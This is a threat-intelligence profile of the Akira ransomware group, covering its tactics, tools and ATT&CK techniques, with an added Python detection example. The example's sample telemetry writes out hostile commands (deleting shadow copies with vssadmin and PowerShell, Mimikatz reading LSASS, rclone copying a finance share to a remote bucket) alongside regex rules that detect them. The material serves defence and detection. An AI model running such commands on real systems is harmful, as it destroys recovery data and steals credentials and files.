| Akira Group | |
|---|---|
| Additional Names | Storm-1567, GOLD SAHARA, PUNK SPIDER |
| Date of Initial Activity | 2023 |
| Location | Unknown |
| Suspected Attribution | Ransomware Group |
| Motivation | Financial Gain |
| Software | Servers |
Overview
The Akira Group has emerged as a notable player in the ransomware landscape since its operations began in March 2023. Characterized by a unique retro aesthetic on their data leak site, this group quickly gained attention for its sophisticated and aggressive approach to cyber extortion. Utilizing multi-extortion tactics, the Akira Group not only encrypts victims’ data but also threatens to release sensitive information on their TOR-based website if ransom demands are not met. This layered approach intensifies the pressure on victims, often leading to significant financial losses.
Targeting a diverse range of sectors, including education, finance, manufacturing, real estate, and healthcare, the Akira Group does not discriminate when it comes to selecting its victims. Their victim selection is notably unspecific: they primarily focus on large enterprises and leverage vulnerabilities in public-facing applications and services to gain initial access. This indiscriminate targeting has raised alarms across industries, as organizations scramble to bolster their defenses against this evolving threat.
Technically, the Akira Group employs a series of sophisticated methods to infiltrate systems, often exploiting weaknesses in multi-factor authentication (MFA) and known vulnerabilities in Virtual Private Network (VPN) software. Once inside, they use advanced tools and techniques to move laterally within the network, dumping credentials and escalating privileges as necessary. The group has gained notoriety for its use of PowerShell commands to execute critical ransomware payloads, remove volume shadow copies, and encrypt files, all while employing clever evasion tactics to avoid detection.
Common Targets
- Information
- Retail Trade
- Finance and Insurance
- Educational Services
- Health Care and Social Assistance
Attack vectors
Software Vulnerabilities
How they work
Initial Access
The initial foothold on the system is obtained via several methods. Multi-factor authentication (MFA) exploitation (e.g. CVE-2023-20269) is mostly used in observed campaigns, along with known vulnerabilities in public-facing services, such as RDP. Spear phishing is also used to gain a foothold; it is generally more effective than plain phishing, as it is addressed to a specific user (group) and/or uses a theme relevant to the recipient(s).
Escalation and Lateral Movement
To escalate privileges and/or move laterally, LSASS dumps are used. Additionally, or alternatively, RDP is used to connect to other machines within the network while moving laterally. Other tools used are PCHunter64, LaZagne, and Mimikatz.
Data Collection and Exfiltration
Once the actors have access to the system, they exfiltrate data. This way, the victim can be extorted twice: once to recover encrypted files, and once to ensure the stolen data is not made available publicly on the Akira extortion blog. To upload the gathered files, RClone, WinSCP, and FileZilla have been observed in use.
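Detection logic for the behaviours described in the Overview and in the Escalation and Exfiltration sections above (shadow-copy removal, LSASS memory dumping, and exfiltration tooling such as RClone, WinSCP and FileZilla), as an added example that is not part of the original profile: it runs three simple rules over constructed sample telemetry and tags each hit with the matching ATT&CK technique ID from the list that follows. The event field names and the LSASS allow-list are assumptions.

```python
import re

# Constructed sample endpoint telemetry (not from the page), loosely modelled
# on Sysmon Event ID 1 (process creation) and Event ID 10 (process access).
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"id": 1, "host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"},
    {"id": 10, "host": "dc01", "image": r"C:\Users\Public\mimikatz.exe",
     "target": r"C:\Windows\System32\lsass.exe"},
    {"id": 1, "host": "fs02", "image": r"C:\Tools\rclone.exe",
     "cmdline": "rclone copy D:\\Finance remote:bucket --transfers 16"},
    {"id": 1, "host": "ws03", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
]

# Shadow-copy removal (T1490) via vssadmin, wmic or the WMI class from PowerShell.
SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows"
    r"|wmic(\.exe)?\s+shadowcopy\s+delete"
    r"|win32_shadowcopy.*(delete|remove-wmiobject)", re.I)
# Exfiltration tools named on the page (T1048), matched on the image file name
# (a renamed binary evades this; pair it with hash or signer checks in practice).
EXFIL_TOOLS = re.compile(r"(^|\\)(rclone|winscp|filezilla)(\.exe)?$", re.I)
# Processes expected to open LSASS; an assumption to be tuned per environment.
LSASS_ALLOWED = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}

def classify(event):
    """Return the ATT&CK technique ID an event matches, or None."""
    image = event["image"].lower()
    if event["id"] == 10 and event.get("target", "").lower().endswith(r"\lsass.exe"):
        if image not in LSASS_ALLOWED:
            return "T1003.001"      # credential dumping from LSASS memory
    if event["id"] == 1:
        if SHADOW_DELETE.search(event["cmdline"]):
            return "T1490"          # inhibit system recovery
        if EXFIL_TOOLS.search(image):
            return "T1048"          # exfiltration over alternative protocol
    return None

def triage(events):
    """Map each host to the sorted list of technique IDs observed on it."""
    hits = {}
    for ev in events:
        tech = classify(ev)
        if tech:
            hits.setdefault(ev["host"], set()).add(tech)
    return {host: sorted(techs) for host, techs in hits.items()}
```

A host that trips both the shadow-copy and the exfiltration rule within a short window is a strong signal of the double-extortion sequence described above and should be escalated rather than handled as isolated alerts.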
MITRE ATT&CK Techniques
T1003.001 OS Credential Dumping: LSASS Memory
T1048 Exfiltration Over Alternative Protocol
T1021.001 Remote Services: Remote Desktop Protocol
T1059.001 Command and Scripting Interpreter: PowerShell
T1106 Native API
T1190 Exploit Public-Facing Application
T1486 Data Encrypted for Impact
T1490 Inhibit System Recovery
T1566 Phishing
T1584 Compromise Infrastructure